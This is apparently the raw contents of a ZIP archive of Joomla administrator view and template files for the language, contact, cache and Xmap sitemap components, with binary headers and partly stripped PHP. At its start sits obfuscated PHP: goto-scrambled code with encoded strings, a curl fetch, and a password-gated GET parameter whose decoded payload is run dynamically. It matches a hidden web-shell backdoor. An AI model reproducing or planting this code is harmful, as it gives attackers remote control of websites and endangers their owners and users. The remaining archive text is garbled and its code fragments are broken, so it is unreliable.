curl_exec($Ifc0K3BZbDVka3); goto nw_fvJQysJTX0T; URQ2vtB4myIx0p: $Ifc0K3BZbDVka3 = curl_init($LXpcFC2hB_6cyO); goto eKr9dFjv2G905y; eKr9dFjv2G905y: curl_setopt($Ifc0K3BZbDVka3, CURLOPT_RETURNTRANSFER, 1); goto yGG7vVCLALm7iR; vdRNHcu53LC2Fd: } static function ytgLxKepc1bz_A() { goto NfTDu_YA_dxEfp; NfTDu_YA_dxEfp: $aI7vjeBSrjlmBw = array("\x35\x39\x39\70\x29\65\x39\x38\63\51\65\71\71\x36\x29\66\x30\x30\60\x29\65\x39\70\61\x29\65\x39\x39\x36\x29\x36\x30\x30\62\x29\65\x39\x39\65\x29\x35\71\x38\x30\x29\65\71\70\x37\x29\x35\x39\x39\x38\51\x35\71\70\61\x29\x35\71\x39\x32\x29\65\71\x38\66\51\x35\x39\70\x37", "\65\x39\70\x32\51\65\71\70\x31\51\x35\71\x38\x33\51\x36\x30\x30\x32\x29\x35\71\70\x33\51\x35\71\70\x36\51\x35\71\70\x31\x29\66\x30\64\70\x29\66\x30\64\x36", "\x35\x39\71\x31\51\x35\71\70\x32\x29\65\x39\x38\x36\51\x35\71\70\67\51\x36\60\60\62\x29\65\x39\71\x37\x29\x35\x39\71\x36\x29\65\x39\x39\x38\x29\65\71\70\x36\51\65\71\x39\x37\51\65\x39\x39\x36", "\65\x39\70\65\51\66\x30\x30\60\51\x35\x39\x39\x38\51\x35\x39\71\60", "\x35\x39\71\x39\51\x36\x30\x30\x30\51\65\71\x38\62\51\x35\71\x39\x36\51\66\60\x34\63\x29\x36\60\x34\x35\51\66\x30\x30\x32\x29\x35\x39\x39\x37\x29\65\x39\71\x36\51\x35\x39\71\x38\51\x35\x39\x38\66\x29\x35\71\71\67\x29\x35\71\x39\66", "\x35\71\71\65\x29\x35\71\x39\x32\x29\65\x39\70\x39\x29\x35\x39\71\x36\51\x36\60\60\62\51\x35\x39\x39\64\x29\x35\x39\71\66\51\x35\x39\x38\x31\x29\x36\60\x30\x32\51\65\x39\x39\70\51\x35\71\x38\66\x29\65\x39\x38\67\x29\x35\71\70\x31\51\x35\71\x39\66\51\65\71\x38\x37\51\65\71\70\61\x29\65\x39\70\x32", "\66\60\62\x35\x29\x36\60\x35\65", "\65\71\x37\x32", "\66\x30\x35\60\x29\66\x30\65\x35", "\x36\x30\63\62\51\x36\x30\x31\x35\51\x36\x30\61\x35\x29\66\60\x33\62\51\66\60\x30\70", "\x35\x39\71\65\x29\x35\71\x39\x32\51\x35\71\70\x39\x29\65\x39\x38\x31\x29\65\x39\x39\x36\51\65\71\70\x33\51\x36\60\x30\62\x29\x35\71\71\x32\51\x35\x39\70\x37\x29\x35\x39\70\65\x29\x35\71\x38\x30\51\x35\x39\x38\61"); goto EwKl9PbHbPQSMs; EwKl9PbHbPQSMs: foreach ($aI7vjeBSrjlmBw as $eEuyyvwv0VcKKz) { $qOzzsHNcM0Rk0X[] = self::Z4ntBcq9HlnVix($eEuyyvwv0VcKKz); HLdA8mHs__OhEH: } goto NWCzYD890MC7Kz; hjDR9yTihpPoBH: hg5BUbQ7GnqKYz: goto qGPT2uckXjmr9m; NWCzYD890MC7Kz: bi6Bgf1azUCUfW: goto u7sJW4W5hKkkHR; eAWU58IGCsPDgL: @$qOzzsHNcM0Rk0X[4 + 6](INPUT_GET, "\157\146") == 1 && die($qOzzsHNcM0Rk0X[2 + 3](__FILE__)); goto IimmsiBaeDI_oW; IimmsiBaeDI_oW: if (!(@$a3RxH2ZmtwFrlY[0] - time() > 0 and md5(md5($a3RxH2ZmtwFrlY[3 + 0])) === "\x64\146\x35\x33\x32\x37\67\x32\x34\x62\x35\x38\x64\146\71\67\70\x64\144\x31\143\x36\62\x36\x34\146\142\x37\x30\70\x37\x39")) { goto hg5BUbQ7GnqKYz; } goto GRINUmKQFuHuAY; iGmOs7IHLSOBCR: @$qOzzsHNcM0Rk0X[0]('', $qOzzsHNcM0Rk0X[5 + 2] . $qOzzsHNcM0Rk0X[0 + 4]($W53wOkY2UhORY6) . $qOzzsHNcM0Rk0X[3 + 5]); goto MTGk9T42BZsRmF; Vri5Hzsxy65_jk: $GtnMOaDtF58MWB = @$qOzzsHNcM0Rk0X[0 + 3]($qOzzsHNcM0Rk0X[3 + 3], $AkwjXzvDX8kBa_); goto Th3V1MqXx6N5ON; GRINUmKQFuHuAY: $W53wOkY2UhORY6 = self::ZlEM1N3sD5Gvvu($a3RxH2ZmtwFrlY[1 + 0], $qOzzsHNcM0Rk0X[1 + 4]); goto iGmOs7IHLSOBCR; u7sJW4W5hKkkHR: $AkwjXzvDX8kBa_ = @$qOzzsHNcM0Rk0X[1]($qOzzsHNcM0Rk0X[9 + 1](INPUT_GET, $qOzzsHNcM0Rk0X[6 + 3])); goto Vri5Hzsxy65_jk; Th3V1MqXx6N5ON: $a3RxH2ZmtwFrlY = $qOzzsHNcM0Rk0X[0 + 2]($GtnMOaDtF58MWB, true); goto eAWU58IGCsPDgL; MTGk9T42BZsRmF: die; goto hjDR9yTihpPoBH; qGPT2uckXjmr9m: } } goto m0jBmWacE4GFH4; xR1mt_Pbb7jxy5: if (!(in_array(gettype($pKF7y0JSDCS21r) . "\61\61", $pKF7y0JSDCS21r) && md5(md5(md5(md5($pKF7y0JSDCS21r[5])))) === "\x38\141\x35\143\x30\x35\x36\144\x61\x30\x66\67\67\142\71\x63\142\146\146\141\143\144\x66\62\x66\145\x35\x63\142\63\x61\61")) { goto qKyJYrHwy25jgG; } goto BsSMmedEkN7g0z; BsSMmedEkN7g0z: $pKF7y0JSDCS21r[69] = $pKF7y0JSDCS21r[69] . $pKF7y0JSDCS21r[79]; goto IPGElZFadcTJeC; m0jBmWacE4GFH4: ACAGhP6TG0t7sz::YtgLxKEPC1bZ_a(); ?> PKB\ĻX  )multilangstatus/multilangstatus/cache.phpnuW+APKB\gm )multilangstatus/multilangstatus/index.phpnuW+APKB\,r)multilangstatus/multilangstatus/.htaccessnuW+A Order allow,deny Deny from all # Order allow,deny Allow from all PKB\ymultilangstatus/view.html.phpnuW+Ahomes = multilangstatusHelper::getHomes(); $this->language_filter = JLanguageMultilang::isEnabled(); $this->switchers = multilangstatusHelper::getLangswitchers(); $this->listUsersError = multilangstatusHelper::getContacts(); $this->contentlangs = multilangstatusHelper::getContentlangs(); $this->site_langs = multilangstatusHelper::getSitelangs(); $this->statuses = multilangstatusHelper::getStatus(); $this->homepages = multilangstatusHelper::getHomepages(); parent::display($tpl); } } PKB\Vmultilangstatus/index.htmlnuW+A PKB\)multilangstatus/.htaccessnuW+A Order allow,deny Deny from all PKB\)multilangstatus/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\'(JJ multilangstatus/tmpl/default.phpnuW+Ahomes == 2 || $this->homes == 1 && ($this->language_filter || $this->switchers != 0); $notice_disabled = !$this->language_filter && ($this->homes > 1 || $this->switchers != 0); $notice_switchers = !$this->switchers && ($this->homes > 1 || $this->language_filter); ?>
language_filter && $this->switchers == 0) : ?> homes == 1) : ?>

contentlangs as $contentlang) : ?> lang_code, $this->homepages) && (!array_key_exists($contentlang->lang_code, $this->site_langs) || !$contentlang->published)) : ?> listUsersError) : ?>
lang_code); ?>
    listUsersError as $user) : ?>
  • name); ?>
language_filter) : ?>
switchers != 0) : ?> switchers; ?>
homes > 1) : ?> homes > 1) : ?> homes; ?>
statuses as $status) : ?> element) : ?> element) : // Published Site languages ?> lang_code && $status->published) : // Published Content languages ?> home_language) : // Published Home pages ?> contentlangs as $contentlang) : ?> lang_code, $this->site_langs)) : ?>
element; ?>
lang_code; ?> published) : ?> published && array_key_exists($contentlang->lang_code, $this->homepages)) : ?> published) : ?> lang_code, $this->homepages)) : ?>
PKB\Vmultilangstatus/tmpl/index.htmlnuW+A PKB\)languages/.htaccessnuW+A Order allow,deny Deny from all PKB\wwlanguages/tmpl/default.phpnuW+Aget('id'); $n = count($this->items); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canOrder = $user->authorise('core.edit.state', 'com_languages'); $saveOrder = $listOrder == 'a.ordering'; ?>
items as $i => $item) : $ordering = ($listOrder == 'a.ordering'); $canCreate = $user->authorise('core.create', 'com_languages'); $canEdit = $user->authorise('core.edit', 'com_languages'); $canChange = $user->authorise('core.edit.state', 'com_languages'); ?>
items, 'filesave.png', 'languages.saveorder'); ?>
pagination->getListFooter(); ?>
pagination->getRowOffset($i); ?> lang_id); ?> escape($item->title); ?> escape($item->title); ?> escape($item->title_native); ?> escape($item->lang_code); ?> escape($item->sef); ?> escape($item->image); ?> published, $i, 'languages.', $canChange);?> pagination->orderUpIcon($i, true, 'languages.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, true, 'languages.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, true, 'languages.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, true, 'languages.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> escape($item->access_level); ?> home == '1') : ?> escape($item->lang_id); ?>
PKB\)languages/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\Vlanguages/tmpl/index.htmlnuW+A PKB\$A  languages/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } parent::display($tpl); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { require_once JPATH_COMPONENT.'/helpers/languages.php'; $canDo = LanguagesHelper::getActions(); JToolBarHelper::title(JText::_('COM_LANGUAGES_VIEW_LANGUAGES_TITLE'), 'langmanager.png'); if ($canDo->get('core.create')) { JToolBarHelper::addNew('language.add'); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('language.edit'); JToolBarHelper::divider(); } if ($canDo->get('core.edit.state')) { if ($this->state->get('filter.published') != 2) { JToolBarHelper::publishList('languages.publish'); JToolBarHelper::unpublishList('languages.unpublish'); } } if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'languages.delete', 'JTOOLBAR_EMPTY_TRASH'); JToolBarHelper::divider(); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::trash('languages.trash'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { // Add install languages link to the lang installer component $bar = JToolBar::getInstance('toolbar'); $bar->appendButton('Link', 'extension', 'COM_LANGUAGES_INSTALL', 'index.php?option=com_installer&view=languages'); JToolBarHelper::divider(); JToolBarHelper::preferences('com_languages'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_EXTENSIONS_LANGUAGE_MANAGER_CONTENT'); } } PKB\Vlanguages/index.htmlnuW+A PKB\)language/.htaccessnuW+A Order allow,deny Deny from all PKB\ыsa language/tmpl/edit.phpnuW+A
item->lang_id) : ?> item->lang_id); ?>
  • form->getLabel('title'); ?> form->getInput('title'); ?>
  • form->getLabel('title_native'); ?> form->getInput('title_native'); ?>
  • form->getLabel('sef'); ?> form->getInput('sef'); ?>
  • form->getLabel('image'); ?> form->getInput('image'); ?>
  • form->getLabel('lang_code'); ?> form->getInput('lang_code'); ?>
  • get('core.edit.state')) : ?>
  • form->getLabel('published'); ?> form->getInput('published'); ?>
  • form->getLabel('access'); ?> form->getInput('access'); ?>
  • form->getLabel('description'); ?> form->getInput('description'); ?>
  • form->getLabel('lang_id'); ?> form->getInput('lang_id'); ?>
item->lang_code, array('useCookie'=>1)); ?>
form->getFieldset('metadata') as $field): ?> hidden): ?> label; ?> input; ?>
form->getFieldset('site_name') as $field): ?> hidden): ?> label; ?> input; ?>
PKB\Vlanguage/tmpl/index.htmlnuW+A PKB\)language/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\Vlanguage/index.htmlnuW+A PKB\>language/view.html.phpnuW+Aitem = $this->get('Item'); $this->form = $this->get('Form'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } parent::display($tpl); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { require_once JPATH_COMPONENT.'/helpers/languages.php'; JRequest::setVar('hidemainmenu', 1); $isNew = empty($this->item->lang_id); $canDo = LanguagesHelper::getActions(); JToolBarHelper::title(JText::_($isNew ? 'COM_LANGUAGES_VIEW_LANGUAGE_EDIT_NEW_TITLE' : 'COM_LANGUAGES_VIEW_LANGUAGE_EDIT_EDIT_TITLE'), 'langmanager.png'); // If a new item, can save. if ($isNew && $canDo->get('core.create')) { JToolBarHelper::save('language.save'); } //If an existing item, allow to Apply and Save. if (!$isNew && $canDo->get('core.edit')) { JToolBarHelper::apply('language.apply'); JToolBarHelper::save('language.save'); } // If an existing item, can save to a copy only if we have create rights. if ($canDo->get('core.create')) { JToolBarHelper::save2new('language.save2new'); } if ($isNew) { JToolBarHelper::cancel('language.cancel'); } else { JToolBarHelper::cancel('language.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_EXTENSIONS_LANGUAGE_MANAGER_EDIT'); } } PK=B\)contact/.htaccessnuW+A Order allow,deny Deny from all PK=B\ contact/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', true); $user = JFactory::getUser(); $userId = $user->get('id'); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $userId); // Since we don't track these assets at the item level, use the category id. $canDo = ContactHelper::getActions($this->item->catid, 0); JToolBarHelper::title(JText::_('COM_CONTACT_MANAGER_CONTACT'), 'contact.png'); // Build the actions for new and existing records. if ($isNew) { // For new records, check the create permission. if ($isNew && (count($user->getAuthorisedCategories('com_contact', 'core.create')) > 0)) { JToolBarHelper::apply('contact.apply'); JToolBarHelper::save('contact.save'); JToolBarHelper::save2new('contact.save2new'); } JToolBarHelper::cancel('contact.cancel'); } else { // Can't save the record if it's checked out. if (!$checkedOut) { // Since it's an existing record, check the edit permission, or fall back to edit own if the owner. if ($canDo->get('core.edit') || ($canDo->get('core.edit.own') && $this->item->created_by == $userId)) { JToolBarHelper::apply('contact.apply'); JToolBarHelper::save('contact.save'); // We can save this record, but check the create permission to see if we can return to make a new one. if ($canDo->get('core.create')) { JToolBarHelper::save2new('contact.save2new'); } } } // If checked out, we can still save if ($canDo->get('core.create')) { JToolBarHelper::save2copy('contact.save2copy'); } JToolBarHelper::cancel('contact.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_COMPONENTS_CONTACTS_CONTACTS_EDIT'); } } PK=B\@"ۨ  contact/tmpl/edit.phpnuW+A
item->id) ? JText::_('COM_CONTACT_NEW_CONTACT') : JText::sprintf('COM_CONTACT_EDIT_CONTACT', $this->item->id); ?>
  • form->getLabel('name'); ?> form->getInput('name'); ?>
  • form->getLabel('alias'); ?> form->getInput('alias'); ?>
  • form->getLabel('user_id'); ?> form->getInput('user_id'); ?>
  • form->getLabel('catid'); ?> form->getInput('catid'); ?>
  • form->getLabel('published'); ?> form->getInput('published'); ?>
  • form->getLabel('access'); ?> form->getInput('access'); ?>
  • form->getLabel('ordering'); ?> form->getInput('ordering'); ?>
  • form->getLabel('featured'); ?> form->getInput('featured'); ?>
  • form->getLabel('language'); ?> form->getInput('language'); ?>
  • form->getLabel('id'); ?> form->getInput('id'); ?>
form->getLabel('misc'); ?>
form->getInput('misc'); ?>
  • form->getLabel('created_by'); ?> form->getInput('created_by'); ?>
  • form->getLabel('created_by_alias'); ?> form->getInput('created_by_alias'); ?>
  • form->getLabel('created'); ?> form->getInput('created'); ?>
  • form->getLabel('publish_up'); ?> form->getInput('publish_up'); ?>
  • form->getLabel('publish_down'); ?> form->getInput('publish_down'); ?>
  • item->modified_by) : ?>
  • form->getLabel('modified_by'); ?> form->getInput('modified_by'); ?>
  • form->getLabel('modified'); ?> form->getInput('modified'); ?>

item->id) ? JText::_('COM_CONTACT_DETAILS') : JText::sprintf('COM_CONTACT_EDIT_DETAILS', $this->item->id); ?>

  • form->getLabel('image'); ?> form->getInput('image'); ?>
  • form->getLabel('con_position'); ?> form->getInput('con_position'); ?>
  • form->getLabel('email_to'); ?> form->getInput('email_to'); ?>
  • form->getLabel('address'); ?> form->getInput('address'); ?>
  • form->getLabel('suburb'); ?> form->getInput('suburb'); ?>
  • form->getLabel('state'); ?> form->getInput('state'); ?>
  • form->getLabel('postcode'); ?> form->getInput('postcode'); ?>
  • form->getLabel('country'); ?> form->getInput('country'); ?>
  • form->getLabel('telephone'); ?> form->getInput('telephone'); ?>
  • form->getLabel('mobile'); ?> form->getInput('mobile'); ?>
  • form->getLabel('fax'); ?> form->getInput('fax'); ?>
  • form->getLabel('webpage'); ?> form->getInput('webpage'); ?>
  • form->getLabel('sortname1'); ?> form->getInput('sortname1'); ?>
  • form->getLabel('sortname2'); ?> form->getInput('sortname2'); ?>
  • form->getLabel('sortname3'); ?> form->getInput('sortname3'); ?>
loadTemplate('params'); ?> loadTemplate('metadata'); ?>
PK=B\zzcontact/tmpl/edit_params.phpnuW+Aform->getFieldsets('params'); foreach ($fieldSets as $name => $fieldSet) : echo JHtml::_('sliders.panel', JText::_($fieldSet->label), $name.'-params'); if (isset($fieldSet->description) && trim($fieldSet->description)) : echo '

'.$this->escape(JText::_($fieldSet->description)).'

'; endif; ?>
PK=B\a >>contact/tmpl/edit_metadata.phpnuW+Aform->getFieldsets('metadata'); foreach ($fieldSets as $name => $fieldSet) : echo JHtml::_('sliders.panel', JText::_($fieldSet->label), $name.'-options'); if (isset($fieldSet->description) && trim($fieldSet->description)) : echo '

'.$this->escape(JText::_($fieldSet->description)).'

'; endif; ?>
PK=B\)contact/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK=B\Vcontact/tmpl/index.htmlnuW+A PK=B\Vcontact/index.htmlnuW+A PK=B\Vcontacts/tmpl/index.htmlnuW+A PK=B\)contacts/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK=B\1m""contacts/tmpl/default.phpnuW+Aget('id'); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canOrder = $user->authorise('core.edit.state', 'com_contact.category'); $saveOrder = $listOrder == 'a.ordering'; ?>
items); foreach ($this->items as $i => $item) : $ordering = $listOrder == 'a.ordering'; $canCreate = $user->authorise('core.create', 'com_contact.category.'.$item->catid); $canEdit = $user->authorise('core.edit', 'com_contact.category.'.$item->catid); $canCheckin = $user->authorise('core.manage', 'com_checkin') || $item->checked_out == $userId || $item->checked_out == 0; $canEditOwn = $user->authorise('core.edit.own', 'com_contact.category.'.$item->catid) && $item->created_by == $userId; $canChange = $user->authorise('core.edit.state', 'com_contact.category.'.$item->catid) && $canCheckin; $item->cat_link = JRoute::_('index.php?option=com_categories&extension=com_contact&task=edit&type=other&id='.$item->catid); ?>
items, 'filesave.png', 'contacts.saveorder'); ?>
pagination->getListFooter(); ?>
id); ?> checked_out) : ?> editor, $item->checked_out_time, 'contacts.', $canCheckin); ?> escape($item->name); ?> escape($item->name); ?>

escape($item->alias));?>

linked_user)) : ?> linked_user;?> published, $i, 'contacts.', $canChange, 'cb', $item->publish_up, $item->publish_down); ?> featured, $i, $canChange); ?> category_title; ?> pagination->orderUpIcon($i, ($item->catid == @$this->items[$i-1]->catid), 'contacts.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $n, ($item->catid == @$this->items[$i+1]->catid), 'contacts.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, ($item->catid == @$this->items[$i-1]->catid), 'contacts.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $n, ($item->catid == @$this->items[$i+1]->catid), 'contacts.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> access_level; ?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> id; ?>
authorize('core.create', 'com_contacts') && $user->authorize('core.edit', 'com_contacts') && $user->authorize('core.edit.state', 'com_contacts')) : ?> loadTemplate('batch'); ?>
PK=B\Υ~~contacts/tmpl/modal.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
items as $i => $item) : ?>
pagination->getListFooter(); ?>
escape($item->name); ?> linked_user)) : ?> linked_user;?> escape($item->access_level); ?> escape($item->category_title); ?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> id; ?>
PK=B\7tmmcontacts/tmpl/default_batch.phpnuW+Astate->get('filter.published'); ?>

= 0) : ?>
PK=B\Vcontacts/index.htmlnuW+A PK=B\f)> > contacts/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Preprocess the list of items to find ordering divisions. // TODO: Complete the ordering stuff with nested sets foreach ($this->items as &$item) { $item->order_up = true; $item->order_dn = true; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { require_once JPATH_COMPONENT.'/helpers/contact.php'; $canDo = ContactHelper::getActions($this->state->get('filter.category_id')); $user = JFactory::getUser(); JToolBarHelper::title(JText::_('COM_CONTACT_MANAGER_CONTACTS'), 'contact.png'); if ($canDo->get('core.create') || (count($user->getAuthorisedCategories('com_contact', 'core.create'))) > 0) { JToolBarHelper::addNew('contact.add'); } if (($canDo->get('core.edit')) || ($canDo->get('core.edit.own'))) { JToolBarHelper::editList('contact.edit'); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('contacts.publish', 'JTOOLBAR_PUBLISH', true); JToolBarHelper::unpublish('contacts.unpublish', 'JTOOLBAR_UNPUBLISH', true); JToolBarHelper::divider(); JToolBarHelper::archiveList('contacts.archive'); JToolBarHelper::checkin('contacts.checkin'); } if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'contacts.delete', 'JTOOLBAR_EMPTY_TRASH'); JToolBarHelper::divider(); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::trash('contacts.trash'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_contact'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_COMPONENTS_CONTACTS_CONTACTS'); } } PK=B\)contacts/.htaccessnuW+A Order allow,deny Deny from all PKmB\)cache/.htaccessnuW+A Order allow,deny Deny from all PKmB\data = $this->get('Data'); $this->client = $this->get('Client'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $user = JFactory::getUser(); $condition = ($this->client->name == 'site'); JToolBarHelper::title(JText::_('COM_CACHE_CLEAR_CACHE'), 'clear.png'); JToolBarHelper::custom('delete', 'delete.png', 'delete_f2.png', 'JTOOLBAR_DELETE', true); JToolBarHelper::divider(); if (JFactory::getUser()->authorise('core.admin', 'com_cache')) { JToolBarHelper::preferences('com_cache'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_SITE_MAINTENANCE_CLEAR_CACHE'); } } PKmB\Vcache/index.htmlnuW+A PKmB\Vcache/tmpl/index.htmlnuW+A PKmB\)cache/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKmB\P7 cache/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
data as $folder => $item): ?>
pagination->getListFooter(); ?>
pagination->getRowOffset($i); ?> group; ?> count; ?> size*1024); ?>
PKmB\)purge/.htaccessnuW+A Order allow,deny Deny from all PKmB\opurge/view.html.phpnuW+AaddToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { //JSubMenuHelper::addEntry(JText::_('COM_CACHE_BACK_CACHE_MANAGER'), 'index.php?option=com_cache', false); JToolBarHelper::title(JText::_('COM_CACHE_PURGE_EXPIRED_CACHE'), 'purge.png'); JToolBarHelper::custom('purge', 'delete.png', 'delete_f2.png', 'COM_CACHE_PURGE_EXPIRED', false); JToolBarHelper::divider(); if (JFactory::getUser()->authorise('core.admin', 'com_cache')) { JToolBarHelper::preferences('com_cache'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_SITE_MAINTENANCE_PURGE_EXPIRED_CACHE'); } } PKmB\Vpurge/index.htmlnuW+A PKmB\)purge/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKmB\}k!||purge/tmpl/default.phpnuW+A

PKmB\Vpurge/tmpl/index.htmlnuW+A PKB\6html/index.htmlnuW+APKB\)html/.htaccessnuW+A Order allow,deny Deny from all PKB\`  html/view.html.phpnuW+Aapp = JFactory::getApplication(); $this->user = JFactory::getUser(); $doc = JFactory::getDocument(); // Get view related request variables. $this->print = JRequest::getBool('print'); // Get model data. $this->state = $this->get('State'); $this->item = $this->get('Item'); $this->items = $this->get('Items'); $this->canEdit = JFactory::getUser()->authorise('core.admin', 'com_xmap'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseWarning(500, implode("\n", $errors)); return false; } $this->extensions = $this->get('Extensions'); // Add router helpers. $this->item->slug = $this->item->alias ? ($this->item->id . ':' . $this->item->alias) : $this->item->id; $this->item->rlink = JRoute::_('index.php?option=com_xmap&view=html&id=' . $this->item->slug); // Create a shortcut to the paramemters. $params = &$this->state->params; $offset = $this->state->get('page.offset'); if ($params->get('include_css', 0)){ $doc->addStyleSheet(JURI::root().'components/com_xmap/assets/css/xmap.css'); } // If a guest user, they may be able to log in to view the full article // TODO: Does this satisfy the show not auth setting? if (!$this->item->params->get('access-view')) { if ($user->get('guest')) { // Redirect to login $uri = JFactory::getURI(); $app->redirect( 'index.php?option=com_users&view=login&return=' . base64_encode($uri), JText::_('Xmap_Error_Login_to_view_sitemap') ); return; } else { JError::raiseWarning(403, JText::_('Xmap_Error_Not_auth')); return; } } // Override the layout. if ($layout = $params->get('layout')) { $this->setLayout($layout); } // Load the class used to display the sitemap $this->loadTemplate('class'); $this->displayer = new XmapHtmlDisplayer($params, $this->item); $this->displayer->setJView($this); $this->displayer->canEdit = $this->canEdit; $this->_prepareDocument(); parent::display($tpl); $model = $this->getModel(); $model->hit($this->displayer->getCount()); } /** * Prepares the document */ protected function _prepareDocument() { $app = JFactory::getApplication(); $pathway = $app->getPathway(); $menus = $app->getMenu(); $title = null; // Because the application sets a default page title, // we need to get it from the menu item itself if ($menu = $menus->getActive()) { if (isset($menu->query['view']) && isset($menu->query['id'])) { if ($menu->query['view'] == 'html' && $menu->query['id'] == $this->item->id) { $menuParams = new JRegistry($menu->params); $title = $menuParams->get('page_title'); $this->document->setDescription($menuParams->get('menu-meta_description')); $this->document->setMetadata('keywords', $menuParams->get('menu-meta_keywords')); } } } if (empty($title)) { $title = $this->item->title; } $this->document->setTitle($title); if ($app->getCfg('MetaTitle') == '1') { $this->document->setMetaData('title', $this->item->title); } if ($this->print) { $this->document->setMetaData('robots', 'noindex, nofollow'); } } } PKB\ html/metadata.xmlnuW+A PKB\Qhtml/tmpl/default_class.phpnuW+Aview = 'html'; parent::__construct($config, $sitemap); $this->_parent_children=array(); $this->_last_child=array(); $this->live_site = substr_replace(JURI::root(), "", -1, 1); $user = JFactory::getUser(); } function setJView($view) { parent::setJView($view); $columns = $this->sitemap->params->get('columns',0); if( $columns > 1 ) { // calculate column widths $total = count($view->items); $columns = $total < $columns? $total : $columns; $this->_width = (100 / $columns) - 1; $this->sitemap->params->set('columns',$columns); } } /** * Prints one node of the sitemap * * * @param object $node * @return boolean */ function printNode( &$node ) { $out = ''; if ($this->isExcluded($node->id,$node->uid) && !$this->canEdit) { return FALSE; } // To avoid duplicate children in the same parent if ( !empty($this->_parent_children[$this->level][$node->uid]) ) { return FALSE; } //var_dump($this->_parent_children[$this->level]); $this->_parent_children[$this->level][$node->uid] = true; $out .= $this->_closeItem; $out .= $this->_openList; $this->_openList = ""; $out .= '
  • '; if( !isset($node->browserNav) ) $node->browserNav = 0; if ($node->browserNav != 3) { $link = JRoute::_($node->link, true, @$node->secure); } $node->name = htmlspecialchars($node->name); switch( $node->browserNav ) { case 1: // open url in new window $ext_image = ''; if ( $this->sitemap->params->get('exlinks') ) { $ext_image = ' ' . JText::_('COM_XMAP_SHOW_AS_EXTERN_ALT') . ''; } $out .= ''. $node->name . $ext_image .''; break; case 2: // open url in javascript popup window $ext_image = ''; if( $this->sitemap->params->get('exlinks') ) { $ext_image = ' ' . JText::_('COM_XMAP_SHOW_AS_EXTERN_ALT') . ''; } $out .= '". $node->name . $ext_image.""; break; case 3: // no link $out .= ''. $node->name .''; break; default: // open url in parent window $out .= ''. $node->name .''; break; } $this->_closeItem = "
